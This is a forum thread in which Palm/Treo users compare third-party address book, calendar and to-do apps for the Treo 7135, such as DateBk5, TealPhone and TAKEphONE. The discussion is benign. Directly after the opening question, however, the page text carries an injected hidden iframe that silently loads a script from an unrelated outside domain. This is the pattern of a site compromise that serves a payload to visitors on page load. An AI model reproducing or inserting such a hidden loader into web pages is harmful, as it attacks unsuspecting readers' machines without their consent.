+ Reply to Thread

address book alternatives

Can other address books be used for the 7135. Or will only the original app work for all the functions? Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: address book alternatives

Originally posted by rcyphermd
    Can other address books be used for the 7135. Or will only the original app work for all the functions? Thanks!
    I'm using DateBk5 (as are a lot of others here). There are many improvements over the default datebook. The only problem in using an alternative datebook like DateBk5 is alarm handling. I let the original datebook handle the alarm and it's working just fine.
    Dave

are you able to dial from it, etc. like the native app? Has anyone tried supernames?

Re: Re: address book alternatives

Originally posted by dwdod
    I'm using DateBk5 (as are a lot of others here). There are many improvements over the default datebook. The only problem in using an alternative datebook like DateBk5 is alarm handling. I let the original datebook handle the alarm and it's working just fine.
    dwood, he was asking about the address book. I use DB5 too, and it is awsome. DB5 handles all my alarms without issue. I even added geek sounds which gives be about 40 differnet alarms to choose from

I am not sure about the address book. Some folks use TAKEphONE, and love it.

I just wish I could find a to-do application that would handle alarms and sync with Outlook

Re: Re: Re: address book alternatives

Originally posted by HoTSynC
    I just wish I could find a to-do application that would handle alarms and sync with Outlook
    I've been wanting that for a long time too... it's not very convenient for me to set alarms on tasks in DateBk5.
    Please visit my picture site: Robert-O-Rama :)

Re: Re: Re: Re: address book alternatives

Originally posted by Robert K.
    I've been wanting that for a long time too... it's not very convenient for me to set alarms on tasks in DateBk5.
    I just stoped using the to-do's/tasks. I set tasks in the calandar instead to take advantage of the alarms.

Have you guys tried ToDO Plus? It can have alarms and doodles attached to every ToDo item. It will sync with Outlook or Palm Desktop, however the alarms and doodles will not sync. It can be found at...

http://www.handshigh.com/html/todoplus.html

Hope this helps
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Re: Re: Re: address book alternatives

Originally posted by HoTSynC
    dwood, he was asking about the address book. I use DB5 too, and it is awsome. DB5 handles all my alarms without issue. I even added geek sounds which gives be about 40 differnet alarms to choose from

I am not sure about the address book. Some folks use TAKEphONE, and love it.

Sorry...wasn't thinking straight I guess.

Address book...I use TealPhone. It's not the favorite here, but I have really come to like it a lot and don't plan to switch :BigKnife:
    Dave

Originally posted by Byrd Dog
    Have you guys tried ToDO Plus? It can have alarms and doodles attached to every ToDo item. It will sync with Outlook or Palm Desktop, however the alarms and doodles will not sync. It can be found at...

http://www.handshigh.com/html/todoplus.html

Hope this helps
    I did, but since the alarms don't sync, it did not do me any good

I just asked on another thread about TakePhone vs. TealPhone. Can someone go over the differences -- I'm VERY new to the Palm scene and have never tried either -- and why they prefer one over the other?

I have used Contacts Pro on my 6135 and absolutely loved it. It seems to have about the same level of functionality of TAKEphONE.

Originally posted by William
    I just asked on another thread about TakePhone vs. TealPhone. Can someone go over the differences -- I'm VERY new to the Palm scene and have never tried either -- and why they prefer one over the other?
    TealPhone

I like it because of the very well designed layout and display of contacts. I have a LOT of contacts (just over 1000). I need to be able to get to the correct contact easily. TealPhone includes an alphabetical listing along the left side of the screen just like the trusy old hand-written phone and address organizer (I'm an old fashioned kinda guy).

Plus, it works extremely well for one-key dialing with my 7135.
    Dave

Bit pusher
    I'm primarily getting my data by syncing to Outlook. Are there any recommendations for calendar/address apps? How does Agendus compare to the others?

paul

How about "Address Plus" ?? I wonder, does that work on the 7135 ??
    Michael